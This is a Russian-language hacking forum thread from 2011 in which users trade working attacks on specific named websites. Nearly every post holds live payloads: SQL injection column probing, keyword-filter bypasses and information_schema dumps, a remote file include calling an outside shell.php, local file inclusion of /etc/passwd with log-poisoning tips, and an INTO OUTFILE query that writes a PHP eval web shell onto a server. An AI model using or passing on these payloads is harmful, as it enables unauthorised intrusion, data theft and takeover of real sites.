20.10.2011, 20:24
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от er9j6@
Как ты подобрал количество полей здесь, объясни если не трудно?
Код:
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(10
Нет ошибки.
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(20
Есть ошибка.
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(15
Есть ошибка.
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(13
Есть ошибка.
http://www.agd.state.tx.us/36id/storyquery.asp?ID=41)+order+by+(12
Нет ошибки.
|
|
|
20.10.2011, 23:02
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+
|
|
|
|
20.10.2011, 23:06
|
|
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
С нами:
8817310
Репутация:
108
|
|
Добрый вечер. Интересует, что можно сделать с этим сайтом. Проблема в том что я нашел лишь одну php-страничку. Даже кавычку подставить некуда. Не понятно так же, что за движок (походу самописный). Сканил структуру сайта меднет-сканнером - тоже ничего интересного.
Сообщение от None
http://marafet.net/include/ajax/modules/gallery/voteImage.php
Все что я смог это получить раскрытие путей, подпортив кукисы.
Сообщение от None
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/gambler/data/www/marafet.net/classes/modules/sys_session/Session.class.php on line 53
Буду благодарен за любую инфу, которая может помочь. |
|
|
|
20.10.2011, 23:22
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от smirk
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+
Можно побаловаться с IF(), но нормально ничего не вытащишь.
http://www.soldatru.ru/read.php?id=IF((SUBSTR(version(),1,1)='5'),1410,-1410)
Если правильно - покажет страницу, нет - не покажет.
регулярка на select, пробовал SeLeCT и т.п. вариации с регистром букв, не помогает.
|
|
|
|
20.10.2011, 23:25
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от smirk
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+
Так, но вывода все равно нет
http://www.soldatru.ru/read.php?id=-1410+%75%6e%69%6f%6e%0a%73%65%6c%65%63%74+1,2,3,4, 5,6,7,8,9,10,11,12,13,14+--+
|
|
|
|
20.10.2011, 23:27
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
В прочем, там и в поиске уязвимость вида SQL INJ.
Пробелы стр_реплейсятся на %, видимо для "улучшения" результатов поиска.
Вместо пробела юзать /**/
В поиск:
http://www.soldatru.ru/search.php
'/**/and/**/1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,user(),version ()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28/**/#
|
|
|
|
20.10.2011, 23:48
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от smirk
хм..
а как такое обойти?
http://www.soldatru.ru/read.php?id=-1410+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 +--+
это вбей в search.php
'and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),( select(null)from(information_schema.columns)where( table_schema!=0x696e666f726d6174696f6e5f736368656d 61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name))))x),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
|
|
|
|
21.10.2011, 18:39
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Как на сайте посмотреть содержимое директории?
http://www.enu.dk/index.php?index=http://site.com/shell.php?c=ls%20-al
команда не выполняется
allow_url_fopen - on
http://www.enu.dk/index.php?index=../phpinfo.php
|
|
|
|
21.10.2011, 19:55
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от er9j6@
Как на сайте посмотреть содержимое директории?
http://www.enu.dk/index.php?index=http://site.com/shell.php?c=ls%20-al
команда не выполняется
allow_url_fopen - on
http://www.enu.dk/index.php?index=../phpinfo.php
Facepalm.
Это LFI, а не RFI. Local File Include.
http://www.enu.dk/index.php?index=../../../../etc/passwd
Дальше либо чекай /proc/self/environ/
/proc/self/fd/2 (вообще от 1 до 7)
Или ищи access логи. И заходи на страницу с юзерагентом по типу
В курле параметр -H
-H "User-Agent: "
|
|
|
|
21.10.2011, 22:01
|
|
Новичок
Регистрация: 25.07.2009
Сообщений: 10
С нами:
8840513
Репутация:
0
|
|
Что неправильно делаю? file_priv=y
Код:
http://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(0x2533433F7068702532306576616C28245F524551554553545B636D645D293B25)/**/from/**/fontan.mp_gw_auth/**/into/**/outfile/**/0x2F7372762F7777772F76686F7374732F7567726174656C2E72752F7368656C6C),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
